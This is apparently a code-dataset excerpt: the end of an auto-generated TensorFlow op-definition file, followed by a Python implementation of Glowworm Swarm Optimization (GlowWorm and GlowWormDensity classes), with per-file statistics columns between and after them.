# type: DT_INT64
# }
# input_arg {
# name: "window_stride"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalSqlDataset"
# input_arg {
# name: "driver_name"
# type: DT_STRING
# }
# input_arg {
# name: "data_source_name"
# type: DT_STRING
# }
# input_arg {
# name: "query"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalStatsAggregatorHandle"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalStatsAggregatorSummary"
# input_arg {
# name: "iterator"
# type: DT_RESOURCE
# }
# output_arg {
# name: "summary"
# type: DT_STRING
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalTakeWhileDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "predicate"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalThreadPoolDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "thread_pool"
# type: DT_RESOURCE
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalThreadPoolHandle"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "num_threads"
# type: "int"
# }
# attr {
# name: "max_intra_op_parallelism"
# type: "int"
# default_value {
# i: 1
# }
# }
# attr {
# name: "display_name"
# type: "string"
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalUnbatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalUniqueDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "SamplingDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "rate"
# type: DT_FLOAT
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "seed2"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "SnapshotDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "path"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "StatsAggregatorHandleV2"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "StatsAggregatorSetSummaryWriter"
# input_arg {
# name: "stats_aggregator"
# type: DT_RESOURCE
# }
# input_arg {
# name: "summary"
# type: DT_RESOURCE
# }
# is_stateful: true
# }
_op_def_lib = _InitOpDefLibrary(b"\n\316\002\n\032ChooseFastestBranchDataset\022\021\n\rinput_dataset\030\025\022\023\n\017ratio_numerator\030\t\022\025\n\021ratio_denominator\030\t\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\032\n\nTarguments\022\nlist(type)(\001\"\"\n\027num_elements_per_branch\022\003int(\0010\001\"\032\n\010branches\022\nlist(func)(\0010\001\"(\n\027other_arguments_lengths\022\tlist(int)(\0010\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\225\001\n\035ExperimentalAssertNextDataset\022\021\n\rinput_dataset\030\025\022\023\n\017transformations\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\233\001\n\034ExperimentalAutoShardDataset\022\021\n\rinput_dataset\030\025\022\017\n\013num_workers\030\t\022\t\n\005index\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\221\001\n%ExperimentalBytesProducedStatsDataset\022\021\n\rinput_dataset\030\025\022\007\n\003tag\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\234\002\n\026ExperimentalCSVDataset\022\r\n\tfilenames\030\007\022\024\n\020compression_type\030\007\022\017\n\013buffer_size\030\t\022\n\n\006header\030\n\022\017\n\013field_delim\030\007\022\023\n\017use_quote_delim\030\n\022\014\n\010na_value\030\007\022\017\n\013select_cols\030\t\022\037\n\017record_defaults2\014output_types\032\n\n\006handle\030\025\")\n\014output_types\022\nlist(type)(\0010\001:\t\n\0072\005\001\002\003\t\007\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\255\001\n 
ExperimentalChooseFastestDataset\022\025\n\016input_datasets\030\025*\001N\032\n\n\006handle\030\025\"\014\n\001N\022\003int(\0010\002\"\026\n\017num_experiments\022\003int\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\nD\n\036ExperimentalDatasetCardinality\022\021\n\rinput_dataset\030\025\032\017\n\013cardinality\030\t\nY\n\035ExperimentalDatasetToTFRecord\022\021\n\rinput_dataset\030\025\022\014\n\010filename\030\007\022\024\n\020compression_type\030\007\210\001\001\n\247\001\n%ExperimentalDenseToSparseBatchDataset\022\021\n\rinput_dataset\030\025\022\016\n\nbatch_size\030\t\022\r\n\trow_shape\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\273\001\n%ExperimentalDirectedInterleaveDataset\022\032\n\026selector_input_dataset\030\025\022\032\n\023data_input_datasets\030\025*\001N\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\"\014\n\001N\022\003int(\0010\001\n\373\004\n!ExperimentalGroupByReducerDataset\022\021\n\rinput_dataset\030\025\0225\n\030key_func_other_arguments2\031Tkey_func_other_arguments\0227\n\031init_func_other_arguments2\032Tinit_func_other_arguments\022;\n\033reduce_func_other_arguments2\034Treduce_func_other_arguments\022?\n\035finalize_func_other_arguments2\036Tfinalize_func_other_arguments\032\n\n\006handle\030\025\"\020\n\010key_func\022\004func\"\021\n\tinit_func\022\004func\"\023\n\013reduce_func\022\004func\"\025\n\rfinalize_func\022\004func\")\n\031Tkey_func_other_arguments\022\nlist(type)(\001\"*\n\032Tinit_func_other_arguments\022\nlist(type)(\001\",\n\034Treduce_func_other_arguments\022\nlist(type)(\001\".\n\036Tfinalize_func_other_arguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\213\004\n 
ExperimentalGroupByWindowDataset\022\021\n\rinput_dataset\030\025\0225\n\030key_func_other_arguments2\031Tkey_func_other_arguments\022;\n\033reduce_func_other_arguments2\034Treduce_func_other_arguments\022E\n window_size_func_other_arguments2!Twindow_size_func_other_arguments\032\n\n\006handle\030\025\"\020\n\010key_func\022\004func\"\023\n\013reduce_func\022\004func\"\030\n\020window_size_func\022\004func\")\n\031Tkey_func_other_arguments\022\nlist(type)(\001\",\n\034Treduce_func_other_arguments\022\nlist(type)(\001\"1\n!Twindow_size_func_other_arguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n=\n\"ExperimentalIdentityIndexedDataset\022\010\n\004size\030\027\032\n\n\006handle\030\025\210\001\001\n\202\001\n\037ExperimentalIgnoreErrorsDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\235\001\n\035ExperimentalIndexedDatasetGet\022\020\n\014materialized\030\024\022\t\n\005index\030\027\032\032\n\ncomponents2\014output_types\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\nI\n%ExperimentalIndexedDatasetMaterialize\022\013\n\007dataset\030\025\022\020\n\014materialized\030\024\210\001\001\n<\n\035ExperimentalIteratorGetDevice\022\014\n\010resource\030\024\032\n\n\006device\030\007\210\001\001\ny\n\027ExperimentalLMDBDataset\022\r\n\tfilenames\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\213\001\n\037ExperimentalLatencyStatsDataset\022\021\n\rinput_dataset\030\025\022\007\n\003tag\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" 
\n\routput_shapes\022\013list(shape)(\0010\001\n\245\002\n\036ExperimentalMapAndBatchDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\022\016\n\nbatch_size\030\t\022\026\n\022num_parallel_calls\030\t\022\022\n\016drop_remainder\030\n\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n\207\002\n\026ExperimentalMapDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\"$\n\030use_inter_op_parallelism\022\004bool\032\002(\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n?\n ExperimentalMatchingFilesDataset\022\014\n\010patterns\030\007\032\n\n\006handle\030\025\210\001\001\n\251\001\n*ExperimentalMaterializedIndexDatasetHandle\032\n\n\006handle\030\024\"\023\n\tcontainer\022\006string\"\025\n\013shared_name\022\006string\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\251\001\n(ExperimentalMaxIntraOpParallelismDataset\022\021\n\rinput_dataset\030\025\022\034\n\030max_intra_op_parallelism\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\205\001\n\"ExperimentalNonSerializableDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" 
\n\routput_shapes\022\013list(shape)(\0010\001\n\251\002\n\"ExperimentalNumaMapAndBatchDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\022\016\n\nbatch_size\030\t\022\026\n\022num_parallel_calls\030\t\022\022\n\016drop_remainder\030\n\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n\267\002\n%ExperimentalParallelInterleaveDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\022\020\n\014cycle_length\030\t\022\020\n\014block_length\030\t\022\n\n\006sloppy\030\n\022\032\n\026buffer_output_elements\030\t\022\033\n\027prefetch_input_elements\030\t\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\354\002\n\037ExperimentalParseExampleDataset\022\021\n\rinput_dataset\030\025\022\026\n\022num_parallel_calls\030\t\022\030\n\016dense_defaults2\006Tdense\032\n\n\006handle\030\025\"\035\n\013sparse_keys\022\014list(string)(\001\"\034\n\ndense_keys\022\014list(string)(\001\"%\n\014sparse_types\022\nlist(type)(\001:\007\n\0052\003\001\t\007\"\037\n\006Tdense\022\nlist(type)(\001:\007\n\0052\003\001\t\007\"\035\n\014dense_shapes\022\013list(shape)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\"\022\n\006sloppy\022\004bool\032\002(\000\n\230\001\n$ExperimentalPrivateThreadPoolDataset\022\021\n\rinput_dataset\030\025\022\017\n\013num_threads\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" 
\n\routput_shapes\022\013list(shape)(\0010\001\n\201\001\n\031ExperimentalRandomDataset\022\010\n\004seed\030\t\022\t\n\005seed2\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\216\001\n\032ExperimentalRebatchDataset\022\021\n\rinput_dataset\030\025\022\017\n\013num_workers\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\225\002\n\027ExperimentalScanDataset\022\021\n\rinput_dataset\030\025\022\027\n\rinitial_state2\006Tstate\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\030\n\006Tstate\022\nlist(type)(\0010\001\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n\276\001\n%ExperimentalSetStatsAggregatorDataset\022\021\n\rinput_dataset\030\025\022\024\n\020stats_aggregator\030\024\022\007\n\003tag\030\007\022\022\n\016counter_prefix\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\223\001\n\030ExperimentalSleepDataset\022\021\n\rinput_dataset\030\025\022\026\n\022sleep_microseconds\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\271\001\n ExperimentalSlidingWindowDataset\022\021\n\rinput_dataset\030\025\022\017\n\013window_size\030\t\022\020\n\014window_shift\030\t\022\021\n\rwindow_stride\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" 
\n\routput_shapes\022\013list(shape)(\0010\001\n\233\001\n\026ExperimentalSqlDataset\022\017\n\013driver_name\030\007\022\024\n\020data_source_name\030\007\022\t\n\005query\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\nf\n!ExperimentalStatsAggregatorHandle\032\n\n\006handle\030\024\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\nB\n\"ExperimentalStatsAggregatorSummary\022\014\n\010iterator\030\024\032\013\n\007summary\030\007\210\001\001\n\315\001\n\034ExperimentalTakeWhileDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\021\n\tpredicate\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\224\001\n\035ExperimentalThreadPoolDataset\022\021\n\rinput_dataset\030\025\022\017\n\013thread_pool\030\024\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\262\001\n\034ExperimentalThreadPoolHandle\032\n\n\006handle\030\024\"\022\n\013num_threads\022\003int\"#\n\030max_intra_op_parallelism\022\003int\032\002\030\001\"\026\n\014display_name\022\006string\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\n}\n\032ExperimentalUnbatchDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n|\n\031ExperimentalUniqueDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" 
\n\routput_shapes\022\013list(shape)(\0010\001\n\221\001\n\017SamplingDataset\022\021\n\rinput_dataset\030\025\022\010\n\004rate\030\001\022\010\n\004seed\030\t\022\t\n\005seed2\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n|\n\017SnapshotDataset\022\021\n\rinput_dataset\030\025\022\010\n\004path\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\\\n\027StatsAggregatorHandleV2\032\n\n\006handle\030\024\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\nG\n\037StatsAggregatorSetSummaryWriter\022\024\n\020stats_aggregator\030\024\022\013\n\007summary\030\024\210\001\001")
| 46.429315
| 13,471
| 0.691201
| 35,138
| 294,269
| 5.410496
| 0.023877
| 0.06596
| 0.050343
| 0.038351
| 0.846171
| 0.827993
| 0.810777
| 0.796359
| 0.769423
| 0.757335
| 0
| 0.020239
| 0.215728
| 294,269
| 6,337
| 13,472
| 46.436642
| 0.803524
| 0.21165
| 0
| 0.746148
| 1
| 0.003514
| 0.1677
| 0.090446
| 0
| 0
| 0
| 0.002367
| 0.004866
| 1
| 0.038389
| false
| 0.012706
| 0.005137
| 0.012706
| 0.108408
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
183834a31e55e0383d4cd646977e238c96accdca
| 8,457
|
py
|
Python
|
Optimization_Methods/GlowWorm.py
|
Skeftical/SuRF-Reproducibility
|
589096b2caa4f173a00f617dd083a042e7b27f5b
|
[
"MIT"
] | null | null | null |
Optimization_Methods/GlowWorm.py
|
Skeftical/SuRF-Reproducibility
|
589096b2caa4f173a00f617dd083a042e7b27f5b
|
[
"MIT"
] | null | null | null |
Optimization_Methods/GlowWorm.py
|
Skeftical/SuRF-Reproducibility
|
589096b2caa4f173a00f617dd083a042e7b27f5b
|
[
"MIT"
] | null | null | null |
import numpy as np
import time
class GlowWorm():
    """Glowworm Swarm Optimization (GSO) for multi-modal optimization.

    Each "glowworm" carries a luciferin level reflecting the quality of its
    current position (via ``opt_func``); worms move probabilistically towards
    brighter neighbours inside an adaptive local-decision radius.
    """
    def _adapt_radius(self, rd, N):
        # Grow the radius when there are fewer than self.nt neighbours,
        # shrink it otherwise; clamp to [0, self.rs].
        return min(self.rs, max(0, rd + self.beta * (self.nt - len(N))))
    def _move(self, xi, xj):
        # Take a step of length self.s from xi towards xj.
        xj = xj.reshape(1, -1)
        xi = xi.reshape(1, -1)
        return xi + self.s * ((xj - xi) / np.linalg.norm(xj - xi))
    def _probability_of_moving(self, lj, li, sN):
        # Probability mass proportional to j's luciferin advantage over i.
        loss = lj - li
        return loss / sN
    def _return_neighbourhood(self, x, rd, l, i):
        # Indices of worms within radius rd of x that are strictly brighter
        # than luciferin level l, excluding worm i itself.
        ix = (np.linalg.norm(self.X - x, axis=1) < rd) & (l < self.L)
        ix[i] = False
        return np.nonzero(ix)[0]  # array of neighbour indices
    def _luciferin_update(self, l, x):
        # Decay the previous luciferin by rho and add gamma * objective value.
        return (1 - self.rho) * l + self.gamma * self.opt_func(x.reshape(1, -1))
    def optimize(self):
        """Run the GSO main loop for self.iter_max iterations.

        Returns the final (glowworms, dimensions) position matrix ``self.X``.
        """
        for k in range(self.iter_max):
            # --- Luciferin update phase ---
            if self.time_capture:
                start = time.time()
            for i in range(self.L.shape[0]):
                self.L[i] = self._luciferin_update(self.L[i], self.X[i])
            if self.time_capture:
                self.SUM_TIME += time.time() - start
            # Prune away invalid glowworms (objective evaluated to -inf)
            # on the first iteration only.
            if self.prune and k == 0:
                valid = self.L != -np.inf
                self.X = self.X[valid]
                self.R = self.R[valid]
                self.L = self.L[valid]
            # --- Movement phase ---
            for i in range(self.X.shape[0]):
                N = self._return_neighbourhood(self.X[i], self.R[i], self.L[i], i)
                if len(N) == 0:
                    # No brighter neighbours: only adapt the radius so the
                    # worm won't die out, then skip the move.
                    self.R[i] = self._adapt_radius(self.R[i], N)
                    continue
                # sN does not depend on j, so compute it once per worm
                # (the original recomputed it for every neighbour).
                # N is non-empty and every L[j] > L[i], so sN > 0.
                sN = np.sum(self.L[N] - self.L[i])
                max_ = None
                max_j = None
                for j in N:
                    pij = self._probability_of_moving(self.L[j], self.L[i], sN)
                    if max_ is None or pij > max_:
                        max_j = j
                        max_ = pij
                self.X[i] = self._move(self.X[i], self.X[max_j])
                self.R[i] = self._adapt_radius(self.R[i], N)
            if self.trace:
                # Append current positions column-wise for later inspection.
                self.history = np.column_stack((self.history, self.X))
        return self.X
    def __init__(self, opt_func, dimensions=1, glowworms=50, s=0.03, r0=2, iter_max=100,
                 rho=0.4, gamma=0.6, beta=0.08, nt=5, search_space=(0, 1), log_trace=False, prune=False, time_capture=False):
        '''
        GlowWorm for multi-modal optimization
        args :
        ----------------------
        opt_func : callable
            optimization function, has to accept an input parameter
        dimensions : int
            Number of dimensions
        glowworms : int
            Number of particles
        s : float
            Step size
        r0 : float
            Initial neighbourhood size
        iter_max : int
            Maximum number of iterations
        rho : float
            Luciferin decay constant
        gamma : float
            Luciferin enhancement constant
        beta : float
            Neighbourhood discount
        nt : int
            Desired number of neighbours used when adapting the radius
        search_space : tuple in R^d
            Search space across all dimensions
        log_trace : boolean
            Logs the path of glowworms for debugging. The paths are then
            available through self.history.
        prune : boolean
            Drop worms whose first objective evaluation is -inf
        time_capture : boolean
            Accumulate luciferin-phase wall time into self.SUM_TIME
        '''
        DIMENSIONS = dimensions
        GLOWWORMS = glowworms
        self.opt_func = opt_func
        self.s = s
        self.r0 = r0
        self.X = np.zeros((GLOWWORMS, DIMENSIONS))
        random_positions = np.random.uniform(low=search_space[0], high=search_space[1], size=(GLOWWORMS, DIMENSIONS))
        self.X += random_positions
        self.L = np.zeros(GLOWWORMS) + 5   # initial luciferin level
        self.R = np.ones(GLOWWORMS) * r0   # per-worm decision radius
        self.iter_max = iter_max
        # Constants
        self.rho = rho      # luciferin decay
        self.gamma = gamma  # luciferin enhancement
        self.beta = beta    # radius adaptation rate
        self.nt = nt        # target neighbourhood size
        self.rs = r0        # maximum sensor radius
        self.trace = False
        self.prune = prune
        self.time_capture = time_capture
        self.SUM_TIME = 0
        if log_trace:
            self.trace = True
            self.history = self.X
class GlowWormDensity():
    """Glowworm Swarm Optimization variant whose move probability can be
    weighted by an external density function ``probx``.

    Behaves like ``GlowWorm`` except that, when ``probx`` is given, the
    probability of moving towards neighbour j is multiplied by
    ``float(probx(X[j]))``.
    """
    def _adapt_radius(self, rd, N):
        # Grow the radius when there are fewer than self.nt neighbours,
        # shrink it otherwise; clamp to [0, self.rs].
        return min(self.rs, max(0, rd + self.beta * (self.nt - len(N))))
    def _move(self, xi, xj):
        # Take a step of length self.s from xi towards xj.
        xj = xj.reshape(1, -1)
        xi = xi.reshape(1, -1)
        return xi + self.s * ((xj - xi) / np.linalg.norm(xj - xi))
    def _probability_of_moving(self, lj, li, sN):
        # Probability mass proportional to j's luciferin advantage over i.
        loss = lj - li
        return loss / sN
    def _return_neighbourhood(self, x, rd, l, i):
        # Indices of worms within radius rd of x that are strictly brighter
        # than luciferin level l, excluding worm i itself.
        ix = (np.linalg.norm(self.X - x, axis=1) < rd) & (l < self.L)
        ix[i] = False
        return np.nonzero(ix)[0]  # array of neighbour indices
    def _luciferin_update(self, l, x):
        # Decay the previous luciferin by rho and add gamma * objective value.
        return (1 - self.rho) * l + self.gamma * self.opt_func(x.reshape(1, -1))
    def optimize(self):
        """Run the GSO main loop for self.iter_max iterations.

        Returns the final (glowworms, dimensions) position matrix ``self.X``.
        """
        for k in range(self.iter_max):
            # --- Luciferin update phase ---
            for i in range(self.L.shape[0]):
                self.L[i] = self._luciferin_update(self.L[i], self.X[i])
            # --- Movement phase ---
            for i in range(self.X.shape[0]):
                N = self._return_neighbourhood(self.X[i], self.R[i], self.L[i], i)
                if len(N) == 0:
                    # No brighter neighbours: only adapt the radius so the
                    # worm won't die out, then skip the move.
                    self.R[i] = self._adapt_radius(self.R[i], N)
                    continue
                # sN does not depend on j, so compute it once per worm
                # (the original recomputed it for every neighbour).
                sN = np.sum(self.L[N] - self.L[i])
                max_ = None
                max_j = None
                for j in N:
                    pij = self._probability_of_moving(self.L[j], self.L[i], sN)
                    if self.probx is not None:
                        # Weight by the external density at the candidate.
                        pij = pij * float(self.probx(self.X[j]))
                    if max_ is None or pij > max_:
                        max_j = j
                        max_ = pij
                self.X[i] = self._move(self.X[i], self.X[max_j])
                self.R[i] = self._adapt_radius(self.R[i], N)
            if self.trace:
                # BUG FIX: log positions once per iteration (as GlowWorm
                # does) instead of once per worm move.
                self.history = np.column_stack((self.history, self.X))
        return self.X
    def __init__(self, opt_func, dimensions=1, glowworms=50, s=0.03, r0=2, iter_max=100,
                 rho=0.4, gamma=0.6, beta=0.08, nt=5, search_space=(0, 1), log_trace=False, probx=None):
        '''
        GlowWorm for multi-modal optimization
        args :
        ----------------------
        opt_func : callable
            optimization function, has to accept an input parameter
        dimensions : int
            Number of dimensions
        glowworms : int
            Number of particles
        s : float
            Step size
        r0 : float
            Initial neighbourhood size
        iter_max : int
            Maximum number of iterations
        rho : float
            Luciferin decay constant
        gamma : float
            Luciferin enhancement constant
        beta : float
            Neighbourhood discount
        nt : int
            Desired number of neighbours used when adapting the radius
        search_space : tuple in R^d
            Search space across all dimensions
        log_trace : boolean
            Logs the path of glowworms for debugging (2-d only). The paths
            are then available through self.history.
        probx : callable or None
            Optional density function weighting the move probability
        '''
        DIMENSIONS = dimensions
        GLOWWORMS = glowworms
        self.opt_func = opt_func
        # BUG FIX: the s, rho, gamma, beta and nt constructor arguments were
        # previously ignored and hard-coded to their default values.
        self.s = s
        self.r0 = r0
        self.X = np.zeros((GLOWWORMS, DIMENSIONS))
        random_positions = np.random.uniform(low=search_space[0], high=search_space[1], size=(GLOWWORMS, DIMENSIONS))
        self.X += random_positions
        self.L = np.zeros(GLOWWORMS) + 5   # initial luciferin level
        self.R = np.ones(GLOWWORMS) * r0   # per-worm decision radius
        self.iter_max = iter_max
        # Constants
        self.rho = rho      # luciferin decay
        self.gamma = gamma  # luciferin enhancement
        self.beta = beta    # radius adaptation rate
        self.nt = nt        # target neighbourhood size
        self.rs = self.r0   # maximum sensor radius
        self.trace = False
        if dimensions == 2 and log_trace:
            self.trace = True
            self.history = self.X
        self.probx = probx
| 37.420354
| 121
| 0.521816
| 1,118
| 8,457
| 3.84347
| 0.150268
| 0.033744
| 0.01536
| 0.013963
| 0.863393
| 0.862462
| 0.862462
| 0.862462
| 0.862462
| 0.862462
| 0
| 0.019051
| 0.366915
| 8,457
| 226
| 122
| 37.420354
| 0.783526
| 0.222065
| 0
| 0.748201
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.100719
| false
| 0
| 0.014388
| 0.028777
| 0.215827
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
